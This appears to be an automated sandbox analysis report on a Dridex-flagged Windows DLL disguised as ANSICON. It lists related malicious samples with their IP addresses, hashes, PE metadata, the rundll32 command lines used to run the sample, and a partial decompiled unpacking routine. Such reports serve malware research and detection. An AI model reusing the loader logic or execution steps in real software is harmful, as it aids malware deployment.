	Ce28zthEz1.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
	t4KzTUSzkx.dll	Get hash	malicious	Browse
	POQ6m91rE7.dll	Get hash	malicious	Browse
	4ryCxciDFA.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
	t4KzTUSzkx.dll	Get hash	malicious	Browse
	POQ6m91rE7.dll	Get hash	malicious	Browse
	6l18PHjcrE.dll	Get hash	malicious	Browse
	4ryCxciDFA.dll	Get hash	malicious	Browse
	PoCqqwACRo.dll	Get hash	malicious	Browse
50.116.27.97	15sV4KdrCN.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
	t4KzTUSzkx.dll	Get hash	malicious	Browse
	POQ6m91rE7.dll	Get hash	malicious	Browse
	4ryCxciDFA.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
	t4KzTUSzkx.dll	Get hash	malicious	Browse
	POQ6m91rE7.dll	Get hash	malicious	Browse
	6l18PHjcrE.dll	Get hash	malicious	Browse
	4ryCxciDFA.dll	Get hash	malicious	Browse
	PoCqqwACRo.dll	Get hash	malicious	Browse
94.247.168.64	15sV4KdrCN.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
	t4KzTUSzkx.dll	Get hash	malicious	Browse
	POQ6m91rE7.dll	Get hash	malicious	Browse
	4ryCxciDFA.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
	t4KzTUSzkx.dll	Get hash	malicious	Browse
	POQ6m91rE7.dll	Get hash	malicious	Browse
	6l18PHjcrE.dll	Get hash	malicious	Browse
	4ryCxciDFA.dll	Get hash	malicious	Browse
	PoCqqwACRo.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DIGITALOCEAN-ASNUS	15sV4KdrCN.dll	Get hash	malicious	Browse	159.203.93.122
	Ce28zthEz1.dll	Get hash	malicious	Browse	159.203.93.122
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	159.203.93.122
	1UmI5PSg3K.dll	Get hash	malicious	Browse	159.203.93.122
	9eYYTTlVYi.dll	Get hash	malicious	Browse	159.203.93.122
	Ce28zthEz1.dll	Get hash	malicious	Browse	159.203.93.122
	15sV4KdrCN.dll	Get hash	malicious	Browse	159.203.93.122
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	159.203.93.122
	1UmI5PSg3K.dll	Get hash	malicious	Browse	159.203.93.122
	9eYYTTlVYi.dll	Get hash	malicious	Browse	159.203.93.122
	9JXXdpfiQm.dll	Get hash	malicious	Browse	159.203.93.122
	t4KzTUSzkx.dll	Get hash	malicious	Browse	159.203.93.122
	POQ6m91rE7.dll	Get hash	malicious	Browse	159.203.93.122
	4ryCxciDFA.dll	Get hash	malicious	Browse	159.203.93.122
	9JXXdpfiQm.dll	Get hash	malicious	Browse	159.203.93.122
	t4KzTUSzkx.dll	Get hash	malicious	Browse	159.203.93.122
	POQ6m91rE7.dll	Get hash	malicious	Browse	159.203.93.122
	6l18PHjcrE.dll	Get hash	malicious	Browse	159.203.93.122
	4ryCxciDFA.dll	Get hash	malicious	Browse	159.203.93.122
	PoCqqwACRo.dll	Get hash	malicious	Browse	159.203.93.122
LINODE-APLinodeLLCUS	15sV4KdrCN.dll	Get hash	malicious	Browse	50.116.27.97
	Ce28zthEz1.dll	Get hash	malicious	Browse	50.116.27.97
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	50.116.27.97
	1UmI5PSg3K.dll	Get hash	malicious	Browse	50.116.27.97
	9eYYTTlVYi.dll	Get hash	malicious	Browse	50.116.27.97
	Ce28zthEz1.dll	Get hash	malicious	Browse	50.116.27.97
	15sV4KdrCN.dll	Get hash	malicious	Browse	50.116.27.97
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	50.116.27.97
	1UmI5PSg3K.dll	Get hash	malicious	Browse	50.116.27.97
	9eYYTTlVYi.dll	Get hash	malicious	Browse	50.116.27.97
	9JXXdpfiQm.dll	Get hash	malicious	Browse	50.116.27.97
	t4KzTUSzkx.dll	Get hash	malicious	Browse	50.116.27.97
	POQ6m91rE7.dll	Get hash	malicious	Browse	50.116.27.97
	4ryCxciDFA.dll	Get hash	malicious	Browse	50.116.27.97
	9JXXdpfiQm.dll	Get hash	malicious	Browse	50.116.27.97
	t4KzTUSzkx.dll	Get hash	malicious	Browse	50.116.27.97
	POQ6m91rE7.dll	Get hash	malicious	Browse	50.116.27.97
	6l18PHjcrE.dll	Get hash	malicious	Browse	50.116.27.97
	4ryCxciDFA.dll	Get hash	malicious	Browse	50.116.27.97
	PoCqqwACRo.dll	Get hash	malicious	Browse	50.116.27.97
GLESYS-ASSE	15sV4KdrCN.dll	Get hash	malicious	Browse	94.247.168.64
	Ce28zthEz1.dll	Get hash	malicious	Browse	94.247.168.64
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	94.247.168.64
	1UmI5PSg3K.dll	Get hash	malicious	Browse	94.247.168.64
	9eYYTTlVYi.dll	Get hash	malicious	Browse	94.247.168.64
	Ce28zthEz1.dll	Get hash	malicious	Browse	94.247.168.64
	15sV4KdrCN.dll	Get hash	malicious	Browse	94.247.168.64
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	94.247.168.64
	1UmI5PSg3K.dll	Get hash	malicious	Browse	94.247.168.64
	9eYYTTlVYi.dll	Get hash	malicious	Browse	94.247.168.64
	9JXXdpfiQm.dll	Get hash	malicious	Browse	94.247.168.64
	t4KzTUSzkx.dll	Get hash	malicious	Browse	94.247.168.64
	POQ6m91rE7.dll	Get hash	malicious	Browse	94.247.168.64
	4ryCxciDFA.dll	Get hash	malicious	Browse	94.247.168.64
	9JXXdpfiQm.dll	Get hash	malicious	Browse	94.247.168.64
	t4KzTUSzkx.dll	Get hash	malicious	Browse	94.247.168.64
	POQ6m91rE7.dll	Get hash	malicious	Browse	94.247.168.64
	6l18PHjcrE.dll	Get hash	malicious	Browse	94.247.168.64
	4ryCxciDFA.dll	Get hash	malicious	Browse	94.247.168.64
	PoCqqwACRo.dll	Get hash	malicious	Browse	94.247.168.64

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_eac5c5ff6135a0fa57fda95e87d917a4681d1_160cf2be_11c400b1\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	9244
Entropy (8bit):	3.7599477570961812
Encrypted:	false
SSDEEP:	96:+XlXyiy9hAdC5Q56tpXIQcQ6c6n+hcEZcw3P+a+z+HbHgiG6eugtYsaV9w72oNEU:ZTHUb+hjbjuq/u7sNS274Itb2h
MD5:	CA637BF3C41F975ED966E82973B6127F
SHA1:	DB8D3B9D91A1EAF74859F3D34894D4A39BA54D1C
SHA-256:	96C329E1CCA8BE541F2724B02D2CCC4A61439ED2130BBE8A02AB6E299B3FD3BF
SHA-512:	D0ECED1B4804A532541EBB0276F4205883C8DCBD98951D022B82F935179AFAE1407D23BDA24F16C7BE5D3F3A00680F17F81AB588391691C8C339547D2BE993FF
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.3.3.7.4.0.0.8.4.9.8.4.0.1.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.4.0.7.7.3.3.-.6.e.d.3.-.4.4.5.c.-.8.e.e.d.-.c.6.6.f.a.9.f.8.e.5.8.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.4.7.f.2.4.b.1.-.4.5.2.5.-.4.8.9.4.-.b.e.f.d.-.c.4.6.3.7.5.a.b.d.1.1.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.b.0.-.0.0.0.1.-.0.0.1.7.-.c.f.7.0.-.4.8.f.d.a.e.3.5.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.4././.0.4.:.1.0.:.5.0.:.5.4.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERECBB.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Apr 20 06:33:30 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	44142
Entropy (8bit):	2.055490315923451
Encrypted:	false
SSDEEP:	192:w0rJHyc+uDuMpxd9WZ/9rABq/YfceZoQJh6CshwChaQloiVa:hSc+uD3pxd9WLncfyQhshwCha6oMa
MD5:	EE022C7A80D19ED999BC496BD418109B
SHA1:	64E5A3D05611DF5B2EB322C4073ACC29352423AD
SHA-256:	1CAFD6DE99F4FADF8B28F33310F5B91BB463598A31FC151F3E22AD4A6C5BDD21
SHA-512:	F5BD06B489639F365A033BA01D34DA184CB2326884FBC34B611F417606D3DC772D5669952DED0863590F1F91C077993797A1D0EB3D4FAAA6851E3CC214D64D36
Malicious:	false
Reputation:	low
Preview:	MDMP....... ........u~`...................U...........B..............GenuineIntelW...........T............u~`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF4FA.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8366
Entropy (8bit):	3.6883289707568223
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNifM6XKQ6YgKSU+Lgmf2S1ACpBg89bBnycqsferm:RrlsNik6XKQ6Y9SU+Lgmf2S1XBn3fj
MD5:	6508757CC3BB29AECC71F9C3F1BCE58D
SHA1:	9611C8227C94B977648BF80B2AFE83F21E26BCD1
SHA-256:	15E63D0FD3407E006E64B8C02AB74CA51823A11F9EBA97F516820054A708EE3D
SHA-512:	977797979492E733726C724195FD67C9827BACDD21FCF6A6730F22B70FB488FB69D35EFFBF80A443E3E4A21FDF26D10B7B8434E7D5C239E3C81CCA31F12853CA
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.7.1.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFAD7.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4658
Entropy (8bit):	4.425136673788134
Encrypted:	false
SSDEEP:	48:cvIwSD8zs8JgtWI9YeWSC8Bk8fm8M4JVFFnS+q8v7G3KcQIcQw6UrrTd:uITf6zfSNHJdSK63Kkw68rTd
MD5:	EF60E3BA1169424447995C7677E86701
SHA1:	B12774F1D531A0FFFCA5EE5D3A6DB2C0C5E4EE77
SHA-256:	534759930EE6EF637059B387CA4F708AAC6C5BF5F13BE456533DC8F9109E4073
SHA-512:	4918E923A29534AF1C190AB59721450754C40446D111E20C9F1876A10E98EA6A82413302BB02D181DD43FD772738BD291F65EBDBA74857EFFA395A7BC9066895
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="954224" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.5485478259715135
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	gsG7jGFk3I.dll
File size:	163840
MD5:	e8675c9ab1bb95547b902176997e37a1
SHA1:	c088263ed0a68c8b9ffb092d41a53603ae25e69b
SHA256:	6934bf4b117408db966b2c8afc1adde7e8bbb2063b7a284727e44a28a6769bea
SHA512:	b283006770f8cc37bb15cc75b652df50f7c24fc59b385477ff2e623cd5bfee7cc7e8c8247d2dc976c59d401af8345f4a2c664e76cc89a10aa3be82e1fec3298c
SSDEEP:	3072:IWX2IjzzpM+PncPeY8+O3AU3HRIHPh3UGfXy0BHNkIv/ScbQQ2y0iNM0+y+N0tc:I42IfzNPnoeY8j3AsHGPXpHNj6rByM3
File Content Preview:	MZ......................@...........................................[}..[}..[}..[}...}..@.2..\|..=.T..}....S.z\|..@..._}..\|...T\|..V/C..\|..V/E..\|..Rich[}..............PE..L.....}`...........!.........f.......D.......P....@....................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x424410
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x607DE4E4 [Mon Apr 19 20:15:32 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	b84fd50f2389cfd5bd83e2cf062986d1

Entrypoint Preview

Instruction
mov edx, 00000000h
mov edx, 00000000h
cmpss xmm1, xmm2, 03h
sub eax, 00002233h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
cmpss xmm1, xmm2, 03h
cmp edx, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
je 00007FBD20979FFBh
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1001	0x0	.text
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2768c	0x59	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x340	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2d000	0x14c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x25040	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x25000	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2356e	0x23600	False	0.761560015459	data	7.55877156847	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x25000	0x2842	0x2a00	False	0.791573660714	data	7.53164670284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0x28000	0x3588	0x1600	False	0.783380681818	MMDF mailbox	7.34765964879	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x340	0x400	False	0.390625	data	2.73456990044	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2d000	0x14c	0x200	False	0.62890625	data	4.21021599876	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x2c060	0x2e0	data	English	United States

Imports

DLL	Import
KERNEL32.dll	CloseHandle, OpenSemaphoreW, LoadLibraryExA, GetModuleHandleW, OutputDebugStringA, GetProfileSectionW
OPENGL32.dll	glTexSubImage1D
ole32.dll	CreateStreamOnHGlobal
USER32.dll	TranslateMessage
ADVAPI32.dll	RegLoadAppKeyW

Version Infos

Description	Data
LegalCopyright	Freeware
InternalName	ANSI32
FileVersion	1.66
CompanyName	Jason Hood
Comments	http://ansicon.adoxa.vze.com/
ProductName	ANSICON
ProductVersion	1.66
FileDescription	ANSI Console
OriginalFilename	ANSI32.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 1712 Parent PID: 5788

General

Start time:	23:32:52
Start date:	19/04/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\gsG7jGFk3I.dll'
Imagebase:	0xb30000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 668 Parent PID: 1712

General

Start time:	23:32:52
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gsG7jGFk3I.dll',#1
Imagebase:	0x870000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4832 Parent PID: 668

General

Start time:	23:32:52
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\gsG7jGFk3I.dll',#1
Imagebase:	0xfc0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4516 Parent PID: 1712

General

Start time:	23:33:20
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\gsG7jGFk3I.dll',ReadLogRecord
Imagebase:	0xfc0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000005.00000002.495709984.000000006E881000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 4480 Parent PID: 1712

General

Start time:	23:33:22
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1712 -s 428
Imagebase:	0xfb0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 1712 Parent PID: 5788 loaddll32.exeCOMMON

Executed Functions

Function 01392213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E01392213(long __ebx, long __edi, void* __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				void* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char* _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				int _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr* _t136;
				int _t143;
				int _t151;
				int _t155;
				intOrPtr _t170;
				int _t177;
				void* _t226;
				intOrPtr _t229;
				intOrPtr _t234;
				void* _t236;
				intOrPtr* _t240;
				intOrPtr _t247;
				intOrPtr _t251;
				DWORD* _t264;
				void* _t268;
				intOrPtr* _t271;
				intOrPtr* _t272;

				_t136 = _a4;
				_v20 = 0;
				_t236 =  *((intOrPtr*)(_t136 + 0x40));
				 *0x1394418 = 1;
				asm("movaps xmm0, [0x1393010]");
				asm("movups [0x1394428], xmm0");
				_v48 = _t136;
				_v52 =  *((intOrPtr*)(_t136 + 0x64));
				_v56 =  *((intOrPtr*)(_v48 + 8));
				_v184 = _t236;
				_v60 =  *((intOrPtr*)(_v48 + 0x50));
				_v180 = _v52;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t136 + 0x60));
				_v68 = 4;
				_v72 = _t236;
				_v76 =  &_v20;
				_t143 = VirtualProtect(__esi, __edi, __ebx, _t264); // executed
				_v80 = _t143;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x64));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E01392569();
				E01391D28(_v72,  *((intOrPtr*)(_v48 + 0xc)), _v56);
				E01392569( *((intOrPtr*)(_v48 + 0xc)), 0, _v56);
				_t151 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t271 = _t268 - 0x88;
				_t226 = _v72;
				_t251 =  *((intOrPtr*)(_t226 + 0x3c));
				_v100 = _t151;
				_v104 = _v72 + 0x3c;
				_v108 = _t226;
				_v112 = _t251;
				if(_t251 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v144 = _v108;
				if(_v60 != 0) {
					_v148 = 0;
					_v152 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					while(1) {
						_t170 = _v152;
						_v160 = _t170;
						_t247 = _v160;
						_v184 = _v72 +  *((intOrPtr*)(_t247 + 0xc));
						_v180 =  *((intOrPtr*)(_t247 + 8));
						_v176 =  *((intOrPtr*)(0x1394418 + (( *(_t170 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t170 + 0x24) >> 0x1f << 3) + (( *(_t170 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v164 = _v148;
						_t177 = VirtualProtect(??, ??, ??, ??); // executed
						_t271 = _t271 - 0x10;
						_t234 = _v164 + 1;
						_v168 = _t177;
						_v148 = _t234;
						_v152 = _v160 + 0x28;
						if(_t234 == _v60) {
							goto L9;
						}
					}
				}
				L9:
				 *_t271 = _v72;
				_v124 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
				_t155 = DisableThreadLibraryCalls(??);
				_t272 = _t271 - 4;
				_t229 =  *_v104;
				_v156 = _t155;
				_v116 = _t229;
				_v120 = _v72;
				if(_t229 != 0) {
					_v120 = _v72 + (_v116 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t240 = _v48;
				_v44 =  *((intOrPtr*)(_t240 + 0x20));
